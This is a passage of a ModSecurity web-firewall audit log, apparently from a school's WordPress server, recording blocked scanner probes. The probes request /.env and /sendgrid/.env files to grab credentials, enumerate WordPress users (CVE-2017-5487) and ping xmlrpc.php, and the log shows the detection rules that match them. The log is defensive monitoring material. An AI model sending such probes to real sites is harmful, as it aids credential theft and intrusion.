sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281c333f-Z-- --487a6503-A-- [09/May/2025:09:11:33 +0700] aB1kVS-fAO47ojYKsMoZDQAAAFc 103.236.140.4 46472 103.236.140.4 8181 --487a6503-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --487a6503-C-- demo.sayHello --487a6503-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --487a6503-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746756693346597 4951 (- - -) Stopwatch2: 1746756693346597 4951; combined=3870, p1=455, p2=3197, p3=30, p4=33, p5=92, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487a6503-Z-- --d9d17712-A-- [09/May/2025:09:13:53 +0700] aB1k4R6q_ZMebht3q15VuAAAAI0 103.236.140.4 46484 103.236.140.4 8181 --d9d17712-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d9d17712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9d17712-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746756833434788 3458 (- - -) Stopwatch2: 1746756833434788 3458; combined=1473, p1=498, p2=938, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9d17712-Z-- --2123fc57-A-- [09/May/2025:09:14:00 +0700] aB1k6B6q_ZMebht3q15VuQAAAIs 103.236.140.4 46488 103.236.140.4 8181 --2123fc57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2123fc57-C-- demo.sayHello --2123fc57-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2123fc57-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746756840926174 5765 (- - -) Stopwatch2: 1746756840926174 5765; combined=4222, p1=537, p2=3530, p3=21, p4=23, p5=65, sr=76, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2123fc57-Z-- --1e052b1b-A-- [09/May/2025:09:18:38 +0700] aB1l_loC-7ITMWTA_c98EwAAAMI 103.236.140.4 46514 103.236.140.4 8181 --1e052b1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e052b1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e052b1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746757118202668 3447 (- - -) Stopwatch2: 1746757118202668 3447; combined=1529, p1=544, p2=948, p3=0, p4=0, p5=37, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e052b1b-Z-- --429de92c-A-- [09/May/2025:09:18:45 +0700] aB1mBVoC-7ITMWTA_c98FQAAAMY 103.236.140.4 46518 103.236.140.4 8181 --429de92c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.56 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --429de92c-C-- demo.sayHello --429de92c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --429de92c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746757125560810 5187 (- - -) Stopwatch2: 1746757125560810 5187; combined=3966, p1=476, p2=3278, p3=23, p4=26, p5=95, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --429de92c-Z-- --4c9c356b-A-- [09/May/2025:10:46:10 +0700] aB16gi-fAO47ojYKsMoZbgAAAFg 103.236.140.4 47184 103.236.140.4 8181 --4c9c356b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.189.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.189.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4c9c356b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c9c356b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746762370866950 791 (- - -) Stopwatch2: 1746762370866950 791; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c9c356b-Z-- --371a5e42-A-- [09/May/2025:11:17:29 +0700] aB2B2S-fAO47ojYKsMobSgAAAEg 103.236.140.4 50696 103.236.140.4 8181 --371a5e42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --371a5e42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --371a5e42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746764249969021 3349 (- - -) Stopwatch2: 1746764249969021 3349; combined=1406, p1=441, p2=926, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --371a5e42-Z-- --e98fca06-A-- [09/May/2025:11:17:36 +0700] aB2B4FoC-7ITMWTA_c99uQAAANE 103.236.140.4 50700 103.236.140.4 8181 --e98fca06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e98fca06-C-- demo.sayHello --e98fca06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e98fca06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746764256386781 5732 (- - -) Stopwatch2: 1746764256386781 5732; combined=4041, p1=679, p2=3152, p3=23, p4=25, p5=96, sr=141, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e98fca06-Z-- --2d4e8343-A-- [09/May/2025:12:01:40 +0700] aB2MNFqQ1nOVx9fWpZTFkwAAAAw 103.236.140.4 50872 103.236.140.4 8181 --2d4e8343-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.51.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.51.157 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2d4e8343-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d4e8343-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746766900038193 887 (- - -) Stopwatch2: 1746766900038193 887; combined=342, p1=299, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d4e8343-Z-- --263edb62-A-- [09/May/2025:12:23:18 +0700] aB2RRlqQ1nOVx9fWpZTGfgAAAA0 103.236.140.4 54234 103.236.140.4 8181 --263edb62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.212.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.212.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --263edb62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --263edb62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746768198429756 3199 (- - -) Stopwatch2: 1746768198429756 3199; combined=1456, p1=540, p2=881, p3=0, p4=0, p5=35, sr=158, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --263edb62-Z-- --7124f453-A-- [09/May/2025:12:25:32 +0700] aB2RzFoC-7ITMWTA_c9_igAAAMQ 103.236.140.4 55988 103.236.140.4 8181 --7124f453-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7124f453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7124f453-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746768332918262 683 (- - -) Stopwatch2: 1746768332918262 683; combined=271, p1=241, p2=0, p3=0, p4=0, p5=30, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7124f453-Z-- --8e2f097c-A-- [09/May/2025:12:25:33 +0700] aB2RzS-fAO47ojYKsMogeQAAAFc 103.236.140.4 56002 103.236.140.4 8181 --8e2f097c-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8e2f097c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e2f097c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746768333714388 912 (- - -) Stopwatch2: 1746768333714388 912; combined=348, p1=304, p2=0, p3=0, p4=0, p5=43, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e2f097c-Z-- --a3379932-A-- [09/May/2025:13:08:41 +0700] aB2b6S-fAO47ojYKsMolgAAAAEI 103.236.140.4 39298 103.236.140.4 8181 --a3379932-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.57.190.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.57.190.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3379932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3379932-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746770921898936 2654 (- - -) Stopwatch2: 1746770921898936 2654; combined=1183, p1=417, p2=733, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3379932-Z-- --02eba679-A-- [09/May/2025:13:17:30 +0700] aB2d-i-fAO47ojYKsMolggAAAEg 103.236.140.4 39328 103.236.140.4 8181 --02eba679-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49 Accept-Charset: utf-8 --02eba679-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02eba679-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746771450850934 861 (- - -) Stopwatch2: 1746771450850934 861; combined=380, p1=339, p2=0, p3=0, p4=0, p5=40, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02eba679-Z-- --cfbf867f-A-- [09/May/2025:13:17:48 +0700] aB2eDFoC-7ITMWTA_c-FMgAAAME 103.236.140.4 39330 103.236.140.4 8181 --cfbf867f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 Accept-Charset: utf-8 --cfbf867f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfbf867f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746771468991375 765 (- - -) Stopwatch2: 1746771468991375 765; combined=325, p1=289, p2=0, p3=0, p4=0, p5=36, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfbf867f-Z-- --92fb6571-A-- [09/May/2025:13:36:37 +0700] aB2idS-fAO47ojYKsMoliAAAAEw 103.236.140.4 39406 103.236.140.4 8181 --92fb6571-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --92fb6571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92fb6571-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746772597148934 825 (- - -) Stopwatch2: 1746772597148934 825; combined=325, p1=284, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92fb6571-Z-- --c715247f-A-- [09/May/2025:13:36:37 +0700] aB2idS-fAO47ojYKsMoliQAAAEQ 103.236.140.4 39410 103.236.140.4 8181 --c715247f-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c715247f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c715247f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746772597766795 757 (- - -) Stopwatch2: 1746772597766795 757; combined=311, p1=275, p2=0, p3=0, p4=0, p5=35, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c715247f-Z-- --a8fec61b-A-- [09/May/2025:13:39:11 +0700] aB2jDx6q_ZMebht3q15eJgAAAI8 103.236.140.4 39434 103.236.140.4 8181 --a8fec61b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8fec61b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8fec61b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746772751808383 3279 (- - -) Stopwatch2: 1746772751808383 3279; combined=1364, p1=468, p2=859, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 